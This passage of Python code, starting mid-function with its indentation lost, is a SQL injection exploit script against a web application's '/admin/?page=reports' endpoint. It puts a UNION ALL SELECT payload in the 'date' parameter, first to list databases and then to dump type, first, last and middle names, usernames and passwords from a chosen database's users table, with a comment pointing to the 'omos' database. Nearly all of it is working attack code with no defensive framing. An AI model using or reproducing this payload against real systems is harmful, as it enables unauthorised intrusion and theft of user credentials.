try:
# HTTP request
response = requests.get(url)
response.raise_for_status() # exception for 4xx and 5xx requests
# data extraction
pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')
extracted_data = pattern.search(response.text)
if extracted_data:
databases = extracted_data.group(1).split(',')
databases = [db.replace('"', '') for db in databases]
print("Available Databases:")
for i, db in enumerate(databases, start=1):
print(f"{i}. {db}")
# users should select omos database
choice = int(input("Please select a database to use (enter number): "))
if 0 < choice <= len(databases):
selected_db = databases[choice - 1]
print(f"You selected: {selected_db}")
fetch_data(domain, selected_db)
else:
print("Invalid selection.")
else:
print("No data extracted.")
except requests.RequestException as e:
print(f"HTTP Request failed: {e}")
def fetch_data(domain, database_name):
url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"
try:
# HTTP request
response = requests.get(url)
response.raise_for_status() # exception for 4xx and 5xx requests
# data extraction
pattern = re.compile(r'enforsec\[(.*?)\]enforsec')
extracted_data = pattern.search(response.text)
if extracted_data:
print("Extracted Admin Users Data:")
data = extracted_data.group(1)
rows = data.split('","')
for row in rows:
clean_row = row.replace('"', '')
user_details = clean_row.split(',')
print(" | ".join(user_details))
else:
print("No data extracted.")
except requests.RequestException as e:
print(f"HTTP Request failed: {e}")